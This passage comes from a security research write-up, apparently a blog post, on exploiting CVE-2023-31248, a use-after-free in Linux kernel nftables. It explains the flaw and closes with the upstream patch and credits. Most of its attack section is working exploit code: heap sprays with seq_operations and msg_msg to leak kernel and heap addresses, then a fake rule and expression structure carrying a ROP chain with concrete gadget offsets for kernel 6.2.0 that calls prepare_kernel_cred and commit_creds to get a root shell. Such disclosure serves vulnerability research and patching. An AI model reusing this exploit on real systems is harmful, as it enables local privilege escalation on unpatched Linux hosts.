		chain->name = nla_strdup(nla[NFTA_CHAIN_NAME], GFP_KERNEL_ACCOUNT);
	} else {
		if (!(flags & NFT_CHAIN_BINDING)) {
			err = -EINVAL;
			goto err_destroy_chain;

		snprintf(name, sizeof(name), "__chain%llu", ++chain_id);
		chain->name = kstrdup(name, GFP_KERNEL_ACCOUNT);
		chain->udata = nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT);
		if (chain->udata == NULL) {
			err = -ENOMEM;
			goto err_destroy_chain;
		chain->udlen = nla_len(nla[NFTA_CHAIN_USERDATA]);

It is possible to leak data via reading from chain->name. However, as chain->name is treated as a string, it is only possible to print data up to a null byte.

To obtain a kernel text leak, struct seq_operations was chosen as the spray object. In kernel version 6.2.0, struct seq_operations is allocated in the kmalloc-cg-32 cache by the function single_open in fs/seq_file.c. This object is perfect for leaking as it contains a pointer to a kernel text pointer (the single_start function).

struct seq_operations {
	void * (*start) (struct seq_file *m, loff_t *pos);
	void (*stop) (struct seq_file *m, void *v);
	void * (*next) (struct seq_file *m, void *v, loff_t *pos);
	int (*show) (struct seq_file *m, void *v);

struct seq_operations was sprayed to reclaim the freed space originally occupied by chain->name [8]. chain->name was then read to obtain a text leak, which can be used to calculate the kernel base [9].

    // Spray seq_operations to fill up kmalloc-cg-32 (chain->name)   
    printf("[+] Spray seq_operations to fill up kmalloc-cg-32 chain->name\n");
    for (int i = 0; i < NUM_SEQOPS; i++) {
        seqops[i] = open("/proc/self/stat", O_RDONLY);               <-- [8]
        if (seqops[i] < 0) {
            perror("[!] open");
    // Get kernel text address leak of single_start and calculate kbase
    char kbase_leak[0x10+1];
    uint64_t k_single_start = 0; // 0x4b2470 offset
    uint64_t kbase = 0;
    int err = 0;
    printf("[+] Getting leak\n");
    // Leak
    struct nftnl_rule *rleak = nftnl_rule_alloc();
    nftnl_rule_set_u32(rleak, NFTNL_RULE_FAMILY, NFPROTO_IPV4);
    nftnl_rule_set_str(rleak, NFTNL_RULE_TABLE, table_name);
    nftnl_rule_set_str(rleak, NFTNL_RULE_CHAIN, "chain2");
    rseq = seq;
    nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETRULE, NFPROTO_IPV4, NLM_F_DUMP, seq++);
    nftnl_rule_nlmsg_build_payload(nlh, rleak);
    mnl_socket_sendto(nl, buf, nlh->nlmsg_len);
    while (rseq < seq) {
        err = mnl_socket_recvfrom(nl, buf, sizeof(buf));
        err = mnl_cb_run(buf, err, rseq, mnl_socket_get_portid(nl), leak_cb, leak_expr_cb);
        rseq += err == 0;
    kbase = number - 0x4b2470;                                       <-- [9]
    printf("[+] Kernel base: 0x%llx\n", kbase);

Obtaining a heap leak

Ideally, to have enough space for our fake struct nft_rule, struct nft_expr and struct nft_expr_ops, we would like to have a kmalloc-cg-1024 heap leak (where we can allocate the struct msg_msg which contains all our fake objects). However, kmalloc-cg-1024 addresses will always end with a null byte, hence preventing us from directly printing the address via chain->name.

In order to circumvent this limitation, we will spray struct msg_msg in the following way as shown below (prev pointers are omitted for simplicity):

Leak kmalloc-cg-96 pointer

In a single message queue, there will be:

  1. Primary message (size 64) – this will reclaim the free space where chain->name originally was
  2. Secondary message (size 96)
  3. Third message (size 1024)

We will first attempt to leak a kmalloc-cg-96 pointer via the UAF read from the freed chain. chain->name would point to the next pointer of the primary message, which would be the address of the secondary message. A size of 96 bytes was chosen as since kmalloc-cg-96 cache objects are small, there is a much lower probability that the last byte of the address would be 0x0 and cause our leak to truncate and fail.

After obtaining a valid kmalloc-cg-96 heap pointer, we now want to leak the kmalloc-cg-1024 heap pointer. The next pointer of the secondary message points to the third message, which is allocated in kmalloc-cg-1024. We also know that the struct nft_chain object (which is now freed) was allocated in kmalloc-cg-128. To obtain the leak, we spray a fourth message of size 128 into the space of the freed chain object, and set the fake chain->name to the address of the kmalloc-cg-96 pointer + 1 to bypass the null byte. This is shown in the diagram below:

Leak kmalloc-cg-1024 pointer

We can now read from chain->name to obtain a kmalloc-cg-1024 pointer.

Controlling RIP

When a new rule is added to a base chain, the following functions are called to ensure that the ruleset will not result in any loops:

    -> nft_table_validate
        -> nft_chain_validate 
            -> expr->ops->validate

When nft_chain_validate is called, the expressions from the rules in the chain will be validated. nftables will use struct list_head rules in the nft_chain structure to determine what rules belong to the chain. However, we are able to control the space previously occupied by the freed target chain. This means that if we create a fake rule, with a fake expression and fake expression ops pointing to our ROP chain, and then spray a fake chain to reclaim the space of the freed target chain, and finally add a new rule to a base chain, we are able to kick off this chain of functions that will allow us to control RIP.

We first free the third message (size 1024) and the fourth message (size 128) which was used to leak the heap pointer. We then construct a fake rule, fake expression, fake expression ops and ROP chain in the data section of a struct msg_msg and spray that as our third message. The fake structures and ROP chain can be seen below:

    // Do all the ROP stuff in kmalloc-cg-1024
    printf("[+] PHASE 3: ROP\n");
    uint64_t fake_rule_addr = kheap_1024 + 0x230;
    printf("[+] Fake rule address: 0x%llx\n", fake_rule_addr);
    uint64_t fake_expr_addr = kheap_1024 + 0x260;
    printf("[+] Fake expr ops: 0x%llx\n", fake_expr_addr);
    // Make a fake rule 
    memset(&msg_three, 0, sizeof(msg_three));
    *(long *)&msg_three.mtype = 0x43;
    *(uint8_t *)&msg_three.mtext[0x215] = 0x10;
    *(long *)&msg_three.mtext[0x218] = fake_expr_addr;
    *(long *)&msg_three.mtext[0x278] = kbase + 0xba612a; // First rop point
    // 0xffffffff81ba612a : push rsi ; jmp qword ptr [rsi - 0x7f]
    // ROP!!!
    *(long *)&msg_three.mtext[0x199] = kbase + 0xd58be; // Second rop point
    // 0xffffffff810d58be : pop rsp ; pop r15 ; ret
    *(long *)&msg_three.mtext[0x220] = kbase + 0xd58c0; // pop rdi ; ret
    *(long *)&msg_three.mtext[0x228] = kbase + 0x2a1b600; // init_task
    *(long *)&msg_three.mtext[0x230] = kbase + 0x126bc0; // prepare_kernel_cred()
    *(long *)&msg_three.mtext[0x238] = kbase + 0xcb0f92; // pop rsi ; ret
    // 0xffffffff81cb0f92 : pop rsi ; ret 0
    *(long *)&msg_three.mtext[0x240] = kheap_1024 + 0x3a0 + 48 + 0x70; // rsi
    *(long *)&msg_three.mtext[0x248] = kbase + 0xd287b6; 
    // 0xffffffff81d287b6 : push rax ; jmp qword ptr [rsi - 0x70]
    // Jump point after push rax
    *(long *)&msg_three.mtext[0x3a0] = kbase + 0xd58c0; // pop rdi ; ret
    *(long *)&msg_three.mtext[0x250] = kbase + 0x1268e0; // commit_creds()
    *(long *)&msg_three.mtext[0x258] = kbase + 0xad163; // 4 pop
    *(long *)&msg_three.mtext[0x280] = kbase + 0x12011cb; // swapgs, iretq
    *(long *)&msg_three.mtext[0x288] = user_rip;
    *(long *)&msg_three.mtext[0x290] = user_cs;
    *(long *)&msg_three.mtext[0x298] = user_rflags;
    *(long *)&msg_three.mtext[0x2a0] = user_sp;
    *(long *)&msg_three.mtext[0x2a8] = user_ss;

    // Spray msg_msg of size 1024
    for (int i = 0; i < NUM_MSQIDS; i++) {
        if (msgsnd(msqid[i], &msg_three, sizeof(msg_three) - sizeof(long), 0) < 0) {
            perror("[!] msg_msg spray failed");

We then spray a fourth struct msg_msg which will act as our fake chain. Shown below is a summary of the objects involved:

Setup for ROP

To kick off the ROP chain, simply add a new rule to the previously created base chain “chain2”, and enjoy your root shell!

Patch Analysis

To patch the bug, simply check the genmask when looking up a chain by its ID.

 net/netfilter/nf_tables_api.c | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index 9573a8fcad79..3701493e5401 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -2694,7 +2694,7 @@ static int nf_tables_updchain(struct nft_ctx *ctx, u8 genmask, u8 policy,
 static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
 					       const struct nft_table *table,
-					       const struct nlattr *nla)
+					       const struct nlattr *nla, u8 genmask)
 	struct nftables_pernet *nft_net = nft_pernet(net);
 	u32 id = ntohl(nla_get_be32(nla));
@@ -2705,7 +2705,8 @@ static struct nft_chain *nft_chain_lookup_byid(const struct net *net,
 		if (trans->msg_type == NFT_MSG_NEWCHAIN &&
 		    chain->table == table &&
-		    id == nft_trans_chain_id(trans))
+		    id == nft_trans_chain_id(trans) &&
+		    nft_active_genmask(chain, genmask))
 			return chain;
 	return ERR_PTR(-ENOENT);
@@ -3809,7 +3810,8 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
 			return -EOPNOTSUPP;
 	} else if (nla[NFTA_RULE_CHAIN_ID]) {
-		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID]);
+		chain = nft_chain_lookup_byid(net, table, nla[NFTA_RULE_CHAIN_ID],
+					      genmask);
 		if (IS_ERR(chain)) {
 			return PTR_ERR(chain);
@@ -10502,7 +10504,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
 		} else if (tb[NFTA_VERDICT_CHAIN_ID]) {
 			chain = nft_chain_lookup_byid(ctx->net, ctx->table,
-						      tb[NFTA_VERDICT_CHAIN_ID]);
+						      tb[NFTA_VERDICT_CHAIN_ID],
+						      genmask);
 			if (IS_ERR(chain))
 				return PTR_ERR(chain);
 		} else {

Exploit Demo

Here is a demonstration of the exploit in action:

The exploit script can be obtained here


I would like to thank my mentor Billy for teaching me so many cool techniques and guiding me, Jacob for giving me this internship opportunity, and everyone else at STAR Labs! :D

References and Credits

  1. Mingi Cho of Theori for reporting CVE-2023-31248
  2. David Bouman for his article on nftables and for the helper library functions https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/
  3. Bien Pham for stabilizing the race condition with audit and for the validate ops idea https://github.com/kungfulon/nf-tables-lpe/tree/master/chain-active
  4. Elixir Bootlin for the kernel source code https://elixir.bootlin.com/linux/v6.2/source/net/netfilter/nf_tables_api.c
  5. Andy Nguyen for msg_msg tricks https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html